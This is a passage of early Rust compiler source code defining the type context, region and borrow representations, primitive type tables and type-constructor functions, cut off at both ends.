RefCell<DefIdMap<@Vec<@TraitRef> >>, // Maps from def-id of a type or region parameter to its // (inferred) variance. item_variance_map: RefCell<DefIdMap<@ItemVariances>>, // A mapping from the def ID of an enum or struct type to the def ID // of the method that implements its destructor. If the type is not // present in this map, it does not have a destructor. This map is // populated during the coherence phase of typechecking. destructor_for_type: RefCell<DefIdMap<ast::DefId>>, // A method will be in this list if and only if it is a destructor. destructors: RefCell<DefIdSet>, // Maps a trait onto a list of impls of that trait. trait_impls: RefCell<DefIdMap<@RefCell<Vec<@Impl> >>>, // Maps a def_id of a type to a list of its inherent impls. // Contains implementations of methods that are inherent to a type. // Methods in these implementations don't need to be exported. inherent_impls: RefCell<DefIdMap<@RefCell<Vec<@Impl> >>>, // Maps a def_id of an impl to an Impl structure. // Note that this contains all of the impls that we know about, // including ones in other crates. It's not clear that this is the best // way to do it. impls: RefCell<DefIdMap<@Impl>>, // Set of used unsafe nodes (functions or blocks). Unsafe nodes not // present in this set can be warned about. used_unsafe: RefCell<NodeSet>, // Set of nodes which mark locals as mutable which end up getting used at // some point. Local variable definitions not in this set can be warned // about. used_mut_nodes: RefCell<NodeSet>, // vtable resolution information for impl declarations impl_vtables: typeck::impl_vtable_map, // The set of external nominal types whose implementations have been read. // This is used for lazy resolution of methods. populated_external_types: RefCell<DefIdSet>, // The set of external traits whose implementations have been read. This // is used for lazy resolution of traits. populated_external_traits: RefCell<DefIdSet>, // Borrows upvar_borrow_map: RefCell<UpvarBorrowMap>, // These two caches are used by const_eval when decoding external statics // and variants that are found. extern_const_statics: RefCell<DefIdMap<Option<@ast::Expr>>>, extern_const_variants: RefCell<DefIdMap<Option<@ast::Expr>>>, } pub enum tbox_flag { has_params = 1, has_self = 2, needs_infer = 4, has_regions = 8, has_ty_err = 16, has_ty_bot = 32, // a meta-flag: subst may be required if the type has parameters, a self // type, or references bound regions needs_subst = 1 | 2 | 8 } pub type t_box = &'static t_box_; pub struct t_box_ { sty: sty, id: uint, flags: uint, } // To reduce refcounting cost, we're representing types as unsafe pointers // throughout the compiler. These are simply casted t_box values. Use ty::get // to cast them back to a box. (Without the cast, compiler performance suffers // ~15%.) This does mean that a t value relies on the ctxt to keep its box // alive, and using ty::get is unsafe when the ctxt is no longer alive. enum t_opaque {} #[allow(raw_pointer_deriving)] #[deriving(Clone, Eq, TotalEq, Hash)] pub struct t { priv inner: *t_opaque } impl fmt::Show for t { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { f.buf.write_str("*t_opaque") } } pub fn get(t: t) -> t_box { unsafe { let t2: t_box = cast::transmute(t); t2 } } pub fn tbox_has_flag(tb: t_box, flag: tbox_flag) -> bool { (tb.flags & (flag as uint)) != 0u } pub fn type_has_params(t: t) -> bool { tbox_has_flag(get(t), has_params) } pub fn type_has_self(t: t) -> bool { tbox_has_flag(get(t), has_self) } pub fn type_needs_infer(t: t) -> bool { tbox_has_flag(get(t), needs_infer) } pub fn type_has_regions(t: t) -> bool { tbox_has_flag(get(t), has_regions) } pub fn type_id(t: t) -> uint { get(t).id } #[deriving(Clone, Eq, TotalEq, Hash)] pub struct BareFnTy { purity: ast::Purity, abis: AbiSet, sig: FnSig } #[deriving(Clone, Eq, TotalEq, Hash)] pub struct ClosureTy { purity: ast::Purity, sigil: ast::Sigil, onceness: ast::Onceness, region: Region, bounds: BuiltinBounds, sig: FnSig, } /** * Signature of a function type, which I have arbitrarily * decided to use to refer to the input/output types. * * - `binder_id` is the node id where this fn type appeared; * it is used to identify all the bound regions appearing * in the input/output types that are bound by this fn type * (vs some enclosing or enclosed fn type) * - `inputs` is the list of arguments and their modes. * - `output` is the return type. * - `variadic` indicates whether this is a varidic function. (only true for foreign fns) */ #[deriving(Clone, Eq, TotalEq, Hash)] pub struct FnSig { binder_id: ast::NodeId, inputs: Vec<t>, output: t, variadic: bool } #[deriving(Clone, Eq, TotalEq, Hash)] pub struct param_ty { idx: uint, def_id: DefId } /// Representation of regions: #[deriving(Clone, Eq, TotalEq, Hash, Encodable, Decodable, Show)] pub enum Region { // Region bound in a type or fn declaration which will be // substituted 'early' -- that is, at the same time when type // parameters are substituted. ReEarlyBound(/* param id */ ast::NodeId, /*index*/ uint, ast::Name), // Region bound in a function scope, which will be substituted when the // function is called. The first argument must be the `binder_id` of // some enclosing function signature. ReLateBound(/* binder_id */ ast::NodeId, BoundRegion), /// When checking a function body, the types of all arguments and so forth /// that refer to bound region parameters are modified to refer to free /// region parameters. ReFree(FreeRegion), /// A concrete region naming some expression within the current function. ReScope(NodeId), /// Static data that has an "infinite" lifetime. Top in the region lattice. ReStatic, /// A region variable. Should not exist after typeck. ReInfer(InferRegion), /// Empty lifetime is for data that is never accessed. /// Bottom in the region lattice. We treat ReEmpty somewhat /// specially; at least right now, we do not generate instances of /// it during the GLB computations, but rather /// generate an error instead. This is to improve error messages. /// The only way to get an instance of ReEmpty is to have a region /// variable with no constraints. ReEmpty, } /** * Upvars do not get their own node-id. Instead, we use the pair of * the original var id (that is, the root variable that is referenced * by the upvar) and the id of the closure expression. */ #[deriving(Clone, Eq, TotalEq, Hash)] pub struct UpvarId { var_id: ast::NodeId, closure_expr_id: ast::NodeId, } #[deriving(Clone, Eq, TotalEq, Hash)] pub enum BorrowKind { /// Data must be immutable and is aliasable. ImmBorrow, /// Data must be immutable but not aliasable. This kind of borrow /// cannot currently be expressed by the user and is used only in /// implicit closure bindings. It is needed when you the closure /// is borrowing or mutating a mutable referent, e.g.: /// /// let x: &mut int = ...; /// let y = || *x += 5; /// /// If we were to try to translate this closure into a more explicit /// form, we'd encounter an error with the code as written: /// /// struct Env { x: & &mut int } /// let x: &mut int = ...; /// let y = (&mut Env { &x }, fn_ptr); // Closure is pair of env and fn /// fn fn_ptr(env: &mut Env) { **env.x += 5; } /// /// This is then illegal because you cannot mutate a `&mut` found /// in an aliasable location. To solve, you'd have to translate with /// an `&mut` borrow: /// /// struct Env { x: & &mut int } /// let x: &mut int = ...; /// let y = (&mut Env { &mut x }, fn_ptr); // changed from &x to &mut x /// fn fn_ptr(env: &mut Env) { **env.x += 5; } /// /// Now the assignment to `**env.x` is legal, but creating a /// mutable pointer to `x` is not because `x` is not mutable. We /// could fix this by declaring `x` as `let mut x`. This is ok in /// user code, if awkward, but extra weird for closures, since the /// borrow is hidden. /// /// So we introduce a "unique imm" borrow -- the referent is /// immutable, but not aliasable. This solves the problem. For /// simplicity, we don't give users the way to express this /// borrow, it's just used when translating closures. UniqueImmBorrow, /// Data is mutable and not aliasable. MutBorrow } /** * Information describing the borrowing of an upvar. This is computed * during `typeck`, specifically by `regionck`. The general idea is * that the compiler analyses treat closures like: * * let closure: &'e fn() = || { * x = 1; // upvar x is assigned to * use(y); // upvar y is read * foo(&z); // upvar z is borrowed immutably * }; * * as if they were "desugared" to something loosely like: * * struct Vars<'x,'y,'z> { x: &'x mut int, * y: &'y const int, * z: &'z int } * let closure: &'e fn() = { * fn f(env: &Vars) { * *env.x = 1; * use(*env.y); * foo(env.z); * } * let env: &'e mut Vars<'x,'y,'z> = &mut Vars { x: &'x mut x, * y: &'y const y, * z: &'z z }; * (env, f) * }; * * This is basically what happens at runtime. The closure is basically * an existentially quantified version of the `(env, f)` pair. * * This data structure indicates the region and mutability of a single * one of the `x...z` borrows. * * It may not be obvious why each borrowed variable gets its own * lifetime (in the desugared version of the example, these are indicated * by the lifetime parameters `'x`, `'y`, and `'z` in the `Vars` definition). * Each such lifetime must encompass the lifetime `'e` of the closure itself, * but need not be identical to it. The reason that this makes sense: * * - Callers are only permitted to invoke the closure, and hence to * use the pointers, within the lifetime `'e`, so clearly `'e` must * be a sublifetime of `'x...'z`. * - The closure creator knows which upvars were borrowed by the closure * and thus `x...z` will be reserved for `'x...'z` respectively. * - Through mutation, the borrowed upvars can actually escape * the closure, so sometimes it is necessary for them to be larger * than the closure lifetime itself. */ #[deriving(Eq, Clone)] pub struct UpvarBorrow { kind: BorrowKind, region: ty::Region, } pub type UpvarBorrowMap = HashMap<UpvarId, UpvarBorrow>; impl Region { pub fn is_bound(&self) -> bool { match self { &ty::ReEarlyBound(..) => true, &ty::ReLateBound(..) => true, _ => false } } } #[deriving(Clone, Eq, Ord, TotalEq, TotalOrd, Hash, Encodable, Decodable, Show)] pub struct FreeRegion { scope_id: NodeId, bound_region: BoundRegion } #[deriving(Clone, Eq, Ord, TotalEq, TotalOrd, Hash, Encodable, Decodable, Show)] pub enum BoundRegion { /// An anonymous region parameter for a given fn (&T) BrAnon(uint), /// Named region parameters for functions (a in &'a T) /// /// The def-id is needed to distinguish free regions in /// the event of shadowing. BrNamed(ast::DefId, ast::Name), /// Fresh bound identifiers created during GLB computations. BrFresh(uint), } /** * Represents the values to use when substituting lifetime parameters. * If the value is `ErasedRegions`, then this subst is occurring during * trans, and all region parameters will be replaced with `ty::ReStatic`. */ #[deriving(Clone, Eq, TotalEq, Hash)] pub enum RegionSubsts { ErasedRegions, NonerasedRegions(OwnedSlice<ty::Region>) } /** * The type substs represents the kinds of things that can be substituted to * convert a polytype into a monotype. Note however that substituting bound * regions other than `self` is done through a different mechanism: * * - `tps` represents the type parameters in scope. They are indexed * according to the order in which they were declared. * * - `self_r` indicates the region parameter `self` that is present on nominal * types (enums, structs) declared as having a region parameter. `self_r` * should always be none for types that are not region-parameterized and * Some(_) for types that are. The only bound region parameter that should * appear within a region-parameterized type is `self`. * * - `self_ty` is the type to which `self` should be remapped, if any. The * `self` type is rather funny in that it can only appear on traits and is * always substituted away to the implementing type for a trait. */ #[deriving(Clone, Eq, TotalEq, Hash)] pub struct substs { self_ty: Option<ty::t>, tps: Vec<t>, regions: RegionSubsts, } mod primitives { use super::t_box_; use syntax::ast; macro_rules! def_prim_ty( ($name:ident, $sty:expr, $id:expr) => ( pub static $name: t_box_ = t_box_ { sty: $sty, id: $id, flags: 0, }; ) ) def_prim_ty!(TY_NIL, super::ty_nil, 0) def_prim_ty!(TY_BOOL, super::ty_bool, 1) def_prim_ty!(TY_CHAR, super::ty_char, 2) def_prim_ty!(TY_INT, super::ty_int(ast::TyI), 3) def_prim_ty!(TY_I8, super::ty_int(ast::TyI8), 4) def_prim_ty!(TY_I16, super::ty_int(ast::TyI16), 5) def_prim_ty!(TY_I32, super::ty_int(ast::TyI32), 6) def_prim_ty!(TY_I64, super::ty_int(ast::TyI64), 7) def_prim_ty!(TY_UINT, super::ty_uint(ast::TyU), 8) def_prim_ty!(TY_U8, super::ty_uint(ast::TyU8), 9) def_prim_ty!(TY_U16, super::ty_uint(ast::TyU16), 10) def_prim_ty!(TY_U32, super::ty_uint(ast::TyU32), 11) def_prim_ty!(TY_U64, super::ty_uint(ast::TyU64), 12) def_prim_ty!(TY_F32, super::ty_float(ast::TyF32), 14) def_prim_ty!(TY_F64, super::ty_float(ast::TyF64), 15) pub static TY_BOT: t_box_ = t_box_ { sty: super::ty_bot, id: 16, flags: super::has_ty_bot as uint, }; pub static TY_ERR: t_box_ = t_box_ { sty: super::ty_err, id: 17, flags: super::has_ty_err as uint, }; pub static LAST_PRIMITIVE_ID: uint = 18; } // NB: If you change this, you'll probably want to change the corresponding // AST structure in libsyntax/ast.rs as well. #[deriving(Clone, Eq, TotalEq, Hash)] pub enum sty { ty_nil, ty_bot, ty_bool, ty_char, ty_int(ast::IntTy), ty_uint(ast::UintTy), ty_float(ast::FloatTy), ty_str(vstore), ty_enum(DefId, substs), ty_box(t), ty_uniq(t), ty_vec(mt, vstore), ty_ptr(mt), ty_rptr(Region, mt), ty_bare_fn(BareFnTy), ty_closure(~ClosureTy), ty_trait(~TyTrait), ty_struct(DefId, substs), ty_tup(Vec<t>), ty_param(param_ty), // type parameter ty_self(DefId), /* special, implicit `self` type parameter; * def_id is the id of the trait */ ty_infer(InferTy), // something used only during inference/typeck ty_err, // Also only used during inference/typeck, to represent // the type of an erroneous expression (helps cut down // on non-useful type error messages) // "Fake" types, used for trans purposes ty_unboxed_vec(mt), } #[deriving(Clone, Eq, TotalEq, Hash)] pub struct TyTrait { def_id: DefId, substs: substs, store: TraitStore, mutability: ast::Mutability, bounds: BuiltinBounds } #[deriving(Eq, TotalEq, Hash)] pub struct TraitRef { def_id: DefId, substs: substs } #[deriving(Clone, Eq)] pub enum IntVarValue { IntType(ast::IntTy), UintType(ast::UintTy), } #[deriving(Clone, Show)] pub enum terr_vstore_kind { terr_vec, terr_str, terr_fn, terr_trait } #[deriving(Clone, Show)] pub struct expected_found<T> { expected: T, found: T } // Data structures used in type unification #[deriving(Clone, Show)] pub enum type_err { terr_mismatch, terr_purity_mismatch(expected_found<Purity>), terr_onceness_mismatch(expected_found<Onceness>), terr_abi_mismatch(expected_found<AbiSet>), terr_mutability, terr_sigil_mismatch(expected_found<ast::Sigil>), terr_box_mutability, terr_ptr_mutability, terr_ref_mutability, terr_vec_mutability, terr_tuple_size(expected_found<uint>), terr_ty_param_size(expected_found<uint>), terr_record_size(expected_found<uint>), terr_record_mutability, terr_record_fields(expected_found<Ident>), terr_arg_count, terr_regions_does_not_outlive(Region, Region), terr_regions_not_same(Region, Region), terr_regions_no_overlap(Region, Region), terr_regions_insufficiently_polymorphic(BoundRegion, Region), terr_regions_overly_polymorphic(BoundRegion, Region), terr_vstores_differ(terr_vstore_kind, expected_found<vstore>), terr_trait_stores_differ(terr_vstore_kind, expected_found<TraitStore>), terr_in_field(@type_err, ast::Ident), terr_sorts(expected_found<t>), terr_integer_as_char, terr_int_mismatch(expected_found<IntVarValue>), terr_float_mismatch(expected_found<ast::FloatTy>), terr_traits(expected_found<ast::DefId>), terr_builtin_bounds(expected_found<BuiltinBounds>), terr_variadic_mismatch(expected_found<bool>) } #[deriving(Eq, TotalEq, Hash)] pub struct ParamBounds { builtin_bounds: BuiltinBounds, trait_bounds: Vec<@TraitRef> } pub type BuiltinBounds = EnumSet<BuiltinBound>; #[deriving(Clone, Encodable, Eq, TotalEq, Decodable, Hash, Show)] #[repr(uint)] pub enum BuiltinBound { BoundStatic, BoundSend, BoundSized, BoundCopy, BoundShare, } pub fn EmptyBuiltinBounds() -> BuiltinBounds { EnumSet::empty() } pub fn AllBuiltinBounds() -> BuiltinBounds { let mut set = EnumSet::empty(); set.add(BoundStatic); set.add(BoundSend); set.add(BoundSized); set.add(BoundShare); set } impl CLike for BuiltinBound { fn to_uint(&self) -> uint { *self as uint } fn from_uint(v: uint) -> BuiltinBound { unsafe { cast::transmute(v) } } } #[deriving(Clone, Eq, TotalEq, Hash)] pub struct TyVid(uint); #[deriving(Clone, Eq, TotalEq, Hash)] pub struct IntVid(uint); #[deriving(Clone, Eq, TotalEq, Hash)] pub struct FloatVid(uint); #[deriving(Clone, Eq, TotalEq, Encodable, Decodable, Hash)] pub struct RegionVid { id: uint } #[deriving(Clone, Eq, TotalEq, Hash)] pub enum InferTy { TyVar(TyVid), IntVar(IntVid), FloatVar(FloatVid) } #[deriving(Clone, Encodable, Decodable, TotalEq, Hash, Show)] pub enum InferRegion { ReVar(RegionVid), ReSkolemized(uint, BoundRegion) } impl cmp::Eq for InferRegion { fn eq(&self, other: &InferRegion) -> bool { match ((*self), *other) { (ReVar(rva), ReVar(rvb)) => { rva == rvb } (ReSkolemized(rva, _), ReSkolemized(rvb, _)) => { rva == rvb } _ => false } } fn ne(&self, other: &InferRegion) -> bool { !((*self) == (*other)) } } pub trait Vid { fn to_uint(&self) -> uint; } impl Vid for TyVid { fn to_uint(&self) -> uint { let TyVid(v) = *self; v } } impl fmt::Show for TyVid { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result{ write!(f.buf, "<generic \\#{}>", self.to_uint()) } } impl Vid for IntVid { fn to_uint(&self) -> uint { let IntVid(v) = *self; v } } impl fmt::Show for IntVid { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f.buf, "<generic integer \\#{}>", self.to_uint()) } } impl Vid for FloatVid { fn to_uint(&self) -> uint { let FloatVid(v) = *self; v } } impl fmt::Show for FloatVid { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f.buf, "<generic float \\#{}>", self.to_uint()) } } impl Vid for RegionVid { fn to_uint(&self) -> uint { self.id } } impl fmt::Show for RegionVid { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { self.id.fmt(f) } } impl fmt::Show for FnSig { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { // grr, without tcx not much we can do. write!(f.buf, "(...)") } } impl fmt::Show for InferTy { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match *self { TyVar(ref v) => v.fmt(f), IntVar(ref v) => v.fmt(f), FloatVar(ref v) => v.fmt(f), } } } impl fmt::Show for IntVarValue { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match *self { IntType(ref v) => v.fmt(f), UintType(ref v) => v.fmt(f), } } } #[deriving(Clone)] pub struct TypeParameterDef { ident: ast::Ident, def_id: ast::DefId, bounds: @ParamBounds, default: Option<ty::t> } #[deriving(Encodable, Decodable, Clone)] pub struct RegionParameterDef { name: ast::Name, def_id: ast::DefId, } /// Information about the type/lifetime parameters associated with an item. /// Analogous to ast::Generics. #[deriving(Clone)] pub struct Generics { /// List of type parameters declared on the item. type_param_defs: Rc<Vec<TypeParameterDef> >, /// List of region parameters declared on the item. /// For a fn or method, only includes *early-bound* lifetimes. region_param_defs: Rc<Vec<RegionParameterDef> >, } impl Generics { pub fn has_type_params(&self) -> bool { !self.type_param_defs.is_empty() } pub fn type_param_defs<'a>(&'a self) -> &'a [TypeParameterDef] { self.type_param_defs.as_slice() } pub fn region_param_defs<'a>(&'a self) -> &'a [RegionParameterDef] { self.region_param_defs.as_slice() } } /// When type checking, we use the `ParameterEnvironment` to track /// details about the type/lifetime parameters that are in scope. /// It primarily stores the bounds information. /// /// Note: This information might seem to be redundant with the data in /// `tcx.ty_param_defs`, but it is not. That table contains the /// parameter definitions from an "outside" perspective, but this /// struct will contain the bounds for a parameter as seen from inside /// the function body. Currently the only real distinction is that /// bound lifetime parameters are replaced with free ones, but in the /// future I hope to refine the representation of types so as to make /// more distinctions clearer. pub struct ParameterEnvironment { /// A substitution that can be applied to move from /// the "outer" view of a type or method to the "inner" view. /// In general, this means converting from bound parameters to /// free parameters. Since we currently represent bound/free type /// parameters in the same way, this only has an affect on regions. free_substs: ty::substs, /// Bound on the Self parameter self_param_bound: Option<@TraitRef>, /// Bounds on each numbered type parameter type_param_bounds: Vec<ParamBounds> , } /// A polytype. /// /// - `bounds`: The list of bounds for each type parameter. The length of the /// list also tells you how many type parameters there are. /// /// - `rp`: true if the type is region-parameterized. Types can have at /// most one region parameter, always called `&self`. /// /// - `ty`: the base type. May have reference to the (unsubstituted) bound /// region `&self` or to (unsubstituted) ty_param types #[deriving(Clone)] pub struct ty_param_bounds_and_ty { generics: Generics, ty: t } /// As `ty_param_bounds_and_ty` but for a trait ref. pub struct TraitDef { generics: Generics, bounds: BuiltinBounds, trait_ref: @ty::TraitRef, } pub struct ty_param_substs_and_ty { substs: ty::substs, ty: ty::t } pub type type_cache = RefCell<DefIdMap<ty_param_bounds_and_ty>>; pub type node_type_table = RefCell<HashMap<uint,t>>; pub fn mk_ctxt(s: Session, dm: resolve::DefMap, named_region_map: resolve_lifetime::NamedRegionMap, map: ast_map::Map, freevars: freevars::freevar_map, region_maps: middle::region::RegionMaps, lang_items: @middle::lang_items::LanguageItems) -> ctxt { ctxt { named_region_map: named_region_map, item_variance_map: RefCell::new(DefIdMap::new()), interner: RefCell::new(FnvHashMap::new()), next_id: Cell::new(primitives::LAST_PRIMITIVE_ID), sess: s, def_map: dm, region_maps: region_maps, node_types: RefCell::new(HashMap::new()), node_type_substs: RefCell::new(NodeMap::new()), trait_refs: RefCell::new(NodeMap::new()), trait_defs: RefCell::new(DefIdMap::new()), map: map, intrinsic_defs: RefCell::new(DefIdMap::new()), freevars: RefCell::new(freevars), tcache: RefCell::new(DefIdMap::new()), rcache: RefCell::new(HashMap::new()), short_names_cache: RefCell::new(HashMap::new()), needs_unwind_cleanup_cache: RefCell::new(HashMap::new()), tc_cache: RefCell::new(HashMap::new()), ast_ty_to_ty_cache: RefCell::new(NodeMap::new()), enum_var_cache: RefCell::new(DefIdMap::new()), methods: RefCell::new(DefIdMap::new()), trait_method_def_ids: RefCell::new(DefIdMap::new()), trait_methods_cache: RefCell::new(DefIdMap::new()), impl_trait_cache: RefCell::new(DefIdMap::new()), ty_param_defs: RefCell::new(NodeMap::new()), adjustments: RefCell::new(NodeMap::new()), normalized_cache: RefCell::new(HashMap::new()), lang_items: lang_items, provided_method_sources: RefCell::new(DefIdMap::new()), supertraits: RefCell::new(DefIdMap::new()), destructor_for_type: RefCell::new(DefIdMap::new()), destructors: RefCell::new(DefIdSet::new()), trait_impls: RefCell::new(DefIdMap::new()), inherent_impls: RefCell::new(DefIdMap::new()), impls: RefCell::new(DefIdMap::new()), used_unsafe: RefCell::new(NodeSet::new()), used_mut_nodes: RefCell::new(NodeSet::new()), impl_vtables: RefCell::new(DefIdMap::new()), populated_external_types: RefCell::new(DefIdSet::new()), populated_external_traits: RefCell::new(DefIdSet::new()), upvar_borrow_map: RefCell::new(HashMap::new()), extern_const_statics: RefCell::new(DefIdMap::new()), extern_const_variants: RefCell::new(DefIdMap::new()), } } // Type constructors // Interns a type/name combination, stores the resulting box in cx.interner, // and returns the box as cast to an unsafe ptr (see comments for t above). pub fn mk_t(cx: &ctxt, st: sty) -> t { // Check for primitive types. match st { ty_nil => return mk_nil(), ty_err => return mk_err(), ty_bool => return mk_bool(), ty_int(i) => return mk_mach_int(i), ty_uint(u) => return mk_mach_uint(u), ty_float(f) => return mk_mach_float(f), ty_char => return mk_char(), ty_bot => return mk_bot(), _ => {} }; let key = intern_key { sty: &st }; match cx.interner.borrow().find(&key) { Some(t) => unsafe { return cast::transmute(&t.sty); }, _ => () } let mut flags = 0u; fn rflags(r: Region) -> uint { (has_regions as uint) | { match r { ty::ReInfer(_) => needs_infer as uint, _ => 0u } } } fn sflags(substs: &substs) -> uint { let mut f = 0u; for tt in substs.tps.iter() { f |= get(*tt).flags; } match substs.regions { ErasedRegions => {} NonerasedRegions(ref regions) => { for r in regions.iter() { f |= rflags(*r) } } } return f; } match &st { &ty_str(vstore_slice(r)) => { flags |= rflags(r); } &ty_vec(ref mt, vstore_slice(r)) => { flags |= rflags(r); flags |= get(mt.ty).flags; } &ty_nil | &ty_bool | &ty_char | &ty_int(_) | &ty_float(_) | &ty_uint(_) | &ty_str(_) => {} // You might think that we could just return ty_err for // any type containing ty_err as a component, and get // rid of the has_ty_err flag -- likewise for ty_bot (with // the exception of function types that return bot). // But doing so caused sporadic memory corruption, and // neither I (tjc) nor nmatsakis could figure out why, // so we're doing it this way. &ty_bot => flags |= has_ty_bot as uint, &ty_err => flags |= has_ty_err as uint, &ty_param(_) => flags |= has_params as uint, &ty_infer(_) => flags |= needs_infer as uint, &ty_self(_) => flags |= has_self as uint, &ty_enum(_, ref substs) | &ty_struct(_, ref substs) | &ty_trait(~ty::TyTrait { ref substs, .. }) => { flags |= sflags(substs); match st { ty_trait(~ty::TyTrait { store: RegionTraitStore(r), .. }) => { flags |= rflags(r); } _ => {} } } &ty_box(tt) | &ty_uniq(tt) => { flags |= get(tt).flags } &ty_vec(ref m, _) | &ty_ptr(ref m) | &ty_unboxed_vec(ref m) => { flags |= get(m.ty).flags; } &ty_rptr(r, ref m) => { flags |= rflags(r); flags |= get(m.ty).flags; } &ty_tup(ref ts) => for tt in ts.iter() { flags |= get(*tt).flags; }, &ty_bare_fn(ref f) => { for a in f.sig.inputs.iter() { flags |= get(*a).flags; } flags |= get(f.sig.output).flags; // T -> _|_ is *not* _|_ ! flags &= !(has_ty_bot as uint); } &ty_closure(ref f) => { flags |= rflags(f.region); for a in f.sig.inputs.iter() { flags |= get(*a).flags; } flags |= get(f.sig.output).flags; // T -> _|_ is *not* _|_ ! flags &= !(has_ty_bot as uint); } } let t = ~t_box_ { sty: st, id: cx.next_id.get(), flags: flags, }; let sty_ptr = &t.sty as *sty; let key = intern_key { sty: sty_ptr, }; cx.interner.borrow_mut().insert(key, t); cx.next_id.set(cx.next_id.get() + 1); unsafe { cast::transmute::<*sty, t>(sty_ptr) } } #[inline] pub fn mk_prim_t(primitive: &'static t_box_) -> t { unsafe { cast::transmute::<&'static t_box_, t>(primitive) } } #[inline] pub fn mk_nil() -> t { mk_prim_t(&primitives::TY_NIL) } #[inline] pub fn mk_err() -> t { mk_prim_t(&primitives::TY_ERR) } #[inline] pub fn mk_bot() -> t { mk_prim_t(&primitives::TY_BOT) } #[inline] pub fn mk_bool() -> t { mk_prim_t(&primitives::TY_BOOL) } #[inline] pub fn mk_int() -> t { mk_prim_t(&primitives::TY_INT) } #[inline] pub fn mk_i8() -> t { mk_prim_t(&primitives::TY_I8) } #[inline] pub fn mk_i16() -> t { mk_prim_t(&primitives::TY_I16) } #[inline] pub fn mk_i32() -> t { mk_prim_t(&primitives::TY_I32) } #[inline] pub fn mk_i64() -> t { mk_prim_t(&primitives::TY_I64) } #[inline] pub fn mk_f32() -> t { mk_prim_t(&primitives::TY_F32) } #[inline] pub fn mk_f64() -> t { mk_prim_t(&primitives::TY_F64) } #[inline] pub fn mk_uint() -> t { mk_prim_t(&primitives::TY_UINT) } #[inline] pub fn mk_u8() -> t { mk_prim_t(&primitives::TY_U8) } #[inline] pub fn mk_u16() -> t { mk_prim_t(&primitives::TY_U16) } #[inline] pub fn mk_u32() -> t { mk_prim_t(&primitives::TY_U32) } #[inline] pub fn mk_u64() -> t { mk_prim_t(&primitives::TY_U64) } pub fn mk_mach_int(tm: ast::IntTy) -> t { match tm { ast::TyI => mk_int(), ast::TyI8 => mk_i8(), ast::TyI16 => mk_i16(), ast::TyI32 => mk_i32(), ast::TyI64 => mk_i64(), } } pub fn mk_mach_uint(tm: ast::UintTy) -> t { match tm { ast::TyU => mk_uint(), ast::TyU8 => mk_u8(), ast::TyU16 => mk_u16(), ast::TyU32 => mk_u32(), ast::TyU64 => mk_u64(), } } pub fn mk_mach_float(tm: ast::FloatTy) -> t { match tm { ast::TyF32 => mk_f32(), ast::TyF64 => mk_f64(), } } #[inline] pub fn mk_char() -> t { mk_prim_t(&primitives::TY_CHAR) } pub fn mk_str(cx: &ctxt, t: vstore) -> t { mk_t(cx, ty_str(t)) } pub fn mk_enum(cx: &ctxt, did: ast::DefId, substs: substs) -> t { // take a copy of substs so that we own the vectors inside mk_t(cx, ty_enum(did, substs)) } pub fn mk_box(cx: &ctxt, ty: t) -> t { mk_t(cx, ty_box(ty)) } pub fn mk_uniq(cx: &ctxt, ty: t) -> t { mk_t(cx, ty_uniq(ty)) } pub fn mk_ptr(cx: &ctxt, tm: mt) -> t { mk_t(cx, ty_ptr(tm)) } pub fn mk_rptr(cx: &ctxt, r: Region, tm: mt) -> t { mk_t(cx, ty_rptr(r, tm)) } pub fn mk_mut_rptr(cx: &ctxt, r: Region, ty: t) -> t { mk_rptr(cx, r, mt {ty: ty, mutbl: ast::MutMutable}) } pub fn mk_imm_rptr(cx: &ctxt, r: Region, ty: t) -> t { mk_rptr(cx, r, mt {ty: ty, mutbl: ast::MutImmutable}) } pub fn mk_mut_ptr(cx: &ctxt, ty: t) -> t { mk_ptr(cx, mt {ty: ty, mutbl: ast::MutMutable}) } pub fn mk_imm_ptr(cx: &ctxt, ty: t) -> t { mk_ptr(cx, mt {ty: ty, mutbl: ast::MutImmutable}) } pub fn mk_nil_ptr(cx: &ctxt) -> t { mk_ptr(cx, mt {ty: mk_nil(), mutbl: ast::MutImmutable}) } pub fn mk_vec(cx: &ctxt, tm: mt, t: vstore) -> t { mk_t(cx, ty_vec(tm, t)) } pub fn mk_unboxed_vec(cx: &ctxt, tm: mt) -> t { mk_t(cx, ty_unboxed_vec(tm)) } pub fn mk_mut_unboxed_vec(cx: &ctxt, ty: t) -> t { mk_t(cx, ty_unboxed_vec(mt {ty: ty, mutbl: ast::MutImmutable})) } pub fn mk_tup(cx: &ctxt, ts: Vec<t>) -> t { mk_t(cx, ty_tup(ts)) } pub fn mk_closure(cx: &ctxt, fty: ClosureTy) -> t { mk_t(cx, ty_closure(~fty)) } pub fn mk_bare_fn(cx: &ctxt, fty: BareFnTy) -> t { mk_t(cx, ty_bare_fn(fty)) } pub fn mk_ctor_fn(cx: &ctxt, binder_id: ast::NodeId, input_tys: &[ty::t], output: ty::t) -> t { let input_args = input_tys.iter().map(|t| *t).collect(); mk_bare_fn(cx, BareFnTy { purity: ast::ImpureFn, abis: AbiSet::Rust(), sig: FnSig { binder_id: binder_id, inputs: input_args, output: output, variadic: false } }) } pub fn mk_trait(cx: &ctxt, did: ast::DefId, substs: substs, store: TraitStore, mutability: ast::Mutability, bounds: BuiltinBounds) -> t { // take a copy of substs so that we own the vectors inside let inner = ~TyTrait { def_id: did, substs: substs, store: store, mutability: mutability, bounds: bounds }; mk_t(cx, ty_trait(inner)) } pub fn mk_struct(cx: &ctxt, struct_id: ast::DefId, substs: substs) -> t { // take a copy of substs so that we own the vectors inside mk_t(cx, ty_struct(struct_id, substs)) } pub fn mk_var(cx: &ctxt, v: TyVid) -> t { mk_infer(cx, TyVar(v)) } pub fn mk_int_var(cx: &ctxt, v: IntVid) -> t { mk_infer(cx, IntVar(v)) } pub fn mk_float_var(cx: &ctxt, v: FloatVid) -> t { mk_infer(cx, FloatVar(v)) } pub fn mk_infer(cx: &ctxt, it: InferTy) -> t { mk_t(cx, ty_infer(it)) } pub fn mk_self(cx: &ctxt, did: ast::DefId) -> t { mk_t(cx, ty_self(did)) } pub fn mk_param(cx: &ctxt, n: uint, k: DefId) -> t { mk_t(cx, ty_param(param_ty { idx: n, def_id: k })) } pub fn walk_ty(ty: t, f: |t|) { maybe_walk_ty(ty, 